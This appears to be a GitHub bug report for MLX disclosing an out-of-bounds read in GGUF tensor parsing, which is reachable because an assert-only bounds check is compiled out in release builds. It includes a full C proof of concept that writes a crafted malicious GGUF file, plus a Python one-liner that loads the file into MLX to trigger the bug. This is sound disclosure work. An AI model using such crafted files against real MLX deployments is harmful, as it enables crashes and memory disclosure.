-
Notifications
You must be signed in to change notification settings - Fork 1.6k
[BUG] get_shape() has no bounds check allowing read of outside data structure #3358
Description
Describe the bug
-
get_shape() has no bounds check (mlx/io/gguf.cpp:50-57)
for (int i = tensor.ndim - 1; i >= 0; i--) {
shape.push_back(tensor.dim[i]); // no check that ndim <= 8
} -
dim[] is fixed at 8 elements (vendored gguflib.h)
#define GGUF_TENSOR_MAX_DIM 8
uint64_t dim[GGUF_TENSOR_MAX_DIM]; -
The only guard is an assert() (vendored gguflib.c:279)
tensor->ndim = *num_dim;
assert(tensor->ndim <= GGUF_TENSOR_MAX_DIM); // compiled out with NDEBUG -
No NDEBUG override in the build (mlx/io/CMakeLists.txt:9-26) — gguflib is built as a plain static library with no flags to
preserve asserts in release mode. -
Two call sites reach get_shape() with untrusted tensor data:
- mlx/io/gguf.cpp:234 — non-quantized tensor loading
- mlx/io/gguf_quants.cpp:112 — quantized tensor loading
- If you access dim[n] where n >= 8 you read the following data:
typedef struct {
const char *name; // 8 bytes
size_t namelen; // 8 bytes
uint32_t type; // 4 bytes
uint32_t ndim; // 4 bytes
uint64_t dim[8]; // 64 bytes <-- dim[0] through dim[7]
// --- everything below is what dim[8+] reads ---
uint64_t offset; // 8 bytes → dim[8]
uint64_t bsize; // 8 bytes → dim[9]
uint64_t num_weights; // 8 bytes → dim[10]
uint8_t *weights_data; // 8 bytes → dim[11]
// --- past the struct boundary ---
// dim[12..31] → stack frame: local variables, saved registers,
// return address, caller's frame, etc.
} gguf_tensor;
To Reproduce
/*
* POC: GGUF Tensor ndim Stack Out-of-Bounds Read (ADVISORY-2026-001 / V1-002)
*
* Demonstrates two vulnerabilities triggered by a crafted GGUF with ndim > 8:
*
* Part A: Shows that assert() is a no-op in release builds (NDEBUG),
* leaving ndim completely unchecked in gguflib.c.
*
* Part B: Directly demonstrates the OOB read in MLX's get_shape().
* A gguf_tensor is placed on the stack with ndim=32 but only
* dim[0..7] initialized. The get_shape() loop reads dim[8..31],
* which are whatever happens to be adjacent in memory.
*
* Part C: Generates a minimal malicious GGUF file (crash_v1002.gguf)
* that can be loaded with actual MLX to trigger the real bug:
* python3 -c "import mlx.core as mx; mx.load_gguf('crash_v1002.gguf')"
*
* Build & run:
* cc -DNDEBUG -O2 -o poc_ndim_oob poc_ndim_oob.c && ./poc_ndim_oob
*
* Optional — build with AddressSanitizer for formal OOB detection:
* cc -DNDEBUG -O0 -fsanitize=address -o poc_ndim_oob_asan poc_ndim_oob.c
* ./poc_ndim_oob_asan
*/
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* ===== Replica of gguflib structures (from gguflib.h) ===== */
#define GGUF_TENSOR_MAX_DIM 8
typedef struct {
const char *name;
size_t namelen;
uint32_t type;
uint32_t ndim;
uint64_t dim[GGUF_TENSOR_MAX_DIM]; /* Fixed 8-element array */
uint64_t offset;
uint64_t bsize;
uint64_t num_weights;
uint8_t *weights_data;
} gguf_tensor;
/* ===== Part A: Demonstrate assert() is a no-op ===== */
static void demo_assert_noop(void) {
printf("--- Part A: assert() behavior under NDEBUG ---\n\n");
uint32_t ndim = 32;
/*
* This is the exact check from gguflib.c ~line 279:
* assert(tensor->ndim <= GGUF_TENSOR_MAX_DIM);
*/
assert(ndim <= GGUF_TENSOR_MAX_DIM);
#ifdef NDEBUG
printf("[!] NDEBUG is defined -- assert() compiled to nothing.\n");
printf(" ndim=%u passed through with ZERO validation.\n", ndim);
printf(" This is the root cause: gguflib trusts assert() for\n");
printf(" untrusted input validation.\n\n");
#else
/* If we reach here without NDEBUG, assert would have aborted above. */
printf("[*] NDEBUG is NOT defined -- assert() is active.\n");
printf(" Rebuild with -DNDEBUG to simulate release behavior.\n\n");
#endif
}
/* ===== Part B: Demonstrate OOB read in get_shape() ===== */
/*
* We place a canary struct right after the tensor on the stack to make
* the OOB read visible. In real MLX, whatever is adjacent on the stack
* (return addresses, saved registers, local variables) gets read instead.
*/
typedef struct {
gguf_tensor tensor;
/* These 24 uint64_t values sit right after tensor.dim[7] in memory,
* occupying the space that dim[8..31] would index into.
* (Some are the struct's own trailing fields; the rest overflow.) */
uint64_t canary[24];
} stacked_layout;
static void demo_get_shape_oob(void) {
printf("--- Part B: OOB read in get_shape() ---\n\n");
stacked_layout layout;
memset(&layout, 0, sizeof(layout));
/* Initialize the tensor as if gguflib parsed it (but without the
* OOB write -- we're isolating the get_shape() read side). */
layout.tensor.ndim = 32; /* Attacker-controlled from GGUF file */
/* Fill the valid dim[0..7] with recognizable values */
for (int i = 0; i < GGUF_TENSOR_MAX_DIM; i++) {
layout.tensor.dim[i] = 100 + i; /* 100, 101, ..., 107 */
}
/* Fill canary region with a distinct pattern so we can see the OOB */
for (int i = 0; i < 24; i++) {
layout.canary[i] = 0xDEADBEEF00000000ULL | (uint64_t)i;
}
/*
* This is the vulnerable loop from mlx/io/gguf.cpp lines 50-57:
*
* Shape get_shape(const gguf_tensor& tensor) {
* Shape shape;
* for (int i = tensor.ndim - 1; i >= 0; i--) {
* shape.push_back(tensor.dim[i]);
* }
* return shape;
* }
*
* We replicate it here, iterating forward for readability:
*/
printf("[*] get_shape() iterates ndim=%u times over dim[%d] array:\n\n",
layout.tensor.ndim, GGUF_TENSOR_MAX_DIM);
printf(" %-8s %-20s %s\n", "Index", "Value", "Status");
printf(" %-8s %-20s %s\n", "-----", "-----", "------");
for (int i = (int)layout.tensor.ndim - 1; i >= 0; i--) {
uint64_t val = layout.tensor.dim[i]; /* OOB read when i >= 8 */
if (i < GGUF_TENSOR_MAX_DIM) {
printf(" dim[%2d] %-20llu OK (valid element)\n",
i, (unsigned long long)val);
} else {
printf(" dim[%2d] 0x%016llx ** OOB READ — adjacent memory! **\n",
i, (unsigned long long)val);
}
}
printf("\n[!] The %d lines marked OOB read memory beyond the dim[] array.\n",
32 - GGUF_TENSOR_MAX_DIM);
printf(" In real MLX, these would be stack variables, return addresses,\n");
printf(" or other struct members — an information disclosure or crash.\n\n");
}
/* ===== Part C: Generate a malicious GGUF file ===== */
static void write_le32(uint8_t *buf, uint32_t val) {
buf[0] = (uint8_t)(val);
buf[1] = (uint8_t)(val >> 8);
buf[2] = (uint8_t)(val >> 16);
buf[3] = (uint8_t)(val >> 24);
}
static void write_le64(uint8_t *buf, uint64_t val) {
for (int i = 0; i < 8; i++)
buf[i] = (uint8_t)(val >> (i * 8));
}
#define MALICIOUS_NDIM 32
#define TENSOR_NAME "weight"
#define ALIGNMENT 32
static void generate_gguf(const char *path) {
printf("--- Part C: Generate malicious GGUF file ---\n\n");
size_t name_len = strlen(TENSOR_NAME);
size_t header_size = 4 + 4 + 8 + 8;
size_t tensor_info_size = 8 + name_len + 4 + (8 * MALICIOUS_NDIM) + 4 + 8;
size_t info_end = header_size + tensor_info_size;
size_t data_start = (info_end + ALIGNMENT - 1) & ~(size_t)(ALIGNMENT - 1);
size_t total_size = data_start + 4; /* 1 F32 element */
uint8_t *buf = (uint8_t *)calloc(1, total_size);
if (!buf) { perror("calloc"); exit(1); }
size_t off = 0;
/* GGUF header (v3) */
memcpy(buf + off, "GGUF", 4); off += 4;
write_le32(buf + off, 3); off += 4;
write_le64(buf + off, 1); off += 8; /* 1 tensor */
write_le64(buf + off, 0); off += 8; /* 0 metadata KV */
/* Tensor info: name */
write_le64(buf + off, name_len); off += 8;
memcpy(buf + off, TENSOR_NAME, name_len); off += name_len;
/* Tensor info: ndim = 32 (MALICIOUS — exceeds GGUF_TENSOR_MAX_DIM) */
write_le32(buf + off, MALICIOUS_NDIM); off += 4;
/* 32 dimension values (only first 8 fit in the struct) */
for (uint32_t i = 0; i < MALICIOUS_NDIM; i++) {
write_le64(buf + off, (i < 8) ? 1 : 0xDEAD0000 + i);
off += 8;
}
/* Tensor type = F32 (0) */
write_le32(buf + off, 0); off += 4;
/* Tensor data offset = 0 */
write_le64(buf + off, 0); off += 8;
/* Tensor data: single float 1.0f */
float one = 1.0f;
memcpy(buf + data_start, &one, 4);
FILE *fp = fopen(path, "wb");
if (!fp) { perror("fopen"); exit(1); }
fwrite(buf, 1, total_size, fp);
fclose(fp);
free(buf);
printf("[+] Written: %s (%zu bytes)\n", path, total_size);
printf(" Tensor 'weight' has ndim=%d (max valid=%d)\n",
MALICIOUS_NDIM, GGUF_TENSOR_MAX_DIM);
printf("\n To trigger in real MLX:\n");
printf(" python3 -c \"import mlx.core as mx; mx.load('%s')\"\n\n", path);
}
/* ===== Main ===== */
int main(void) {
printf("=========================================================\n");
printf(" ADVISORY-2026-001 POC: GGUF Tensor ndim OOB Read\n");
printf(" Affects: MLX <= commit befe42d3\n");
printf("=========================================================\n\n");
demo_assert_noop();
demo_get_shape_oob();
generate_gguf("crash_v1002.gguf");
return 0;
}Compile:
cc -DNDEBUG -O2 -o poc_ndim_oob poc_ndim_oob.c && ./poc_ndim_oobOptional: build with AddressSanitizer for formal OOB detection:
cc -DNDEBUG -O0 -fsanitize=address -o poc_ndim_oob_asan poc_ndim_oob.crun: ./poc_ndim_oob_asan
Reproducable in Python as well:
python3 -c "import mlx.core as mx; mx.load('crash_v1002.gguf')"
Expected behavior
Check out https://github.com/ggml-org/ggml/blob/master/docs/gguf.md
If you scroll down you will see, as of today, dimensions should be <= 4. 8 is excessive (unless it changes in gguf)
struct gguf_tensor_info_t {
// The name of the tensor. It is a standard GGUF string, with the caveat that
// it must be at most 64 bytes long.
gguf_string_t name;
// The number of dimensions in the tensor.
// Currently at most 4, but this may change in the future.
uint32_t n_dimensions;
// The dimensions of the tensor.
uint64_t dimensions[n_dimensions];
// The type of the tensor.
ggml_type type;
// The offset of the tensor's data in this file in bytes.
//
// This offset is relative to `tensor_data`, not to the start
// of the file, to make it easier for writers to write the file.
// Readers should consider exposing this offset relative to the
// file to make it easier to read the data.
//
// Must be a multiple of `ALIGNMENT`. That is, `align_offset(offset) == offset`.
uint64_t offset;
};Desktop (please complete the following information):
- OS Version: MacOS 26.3.1 (a) M2 16GB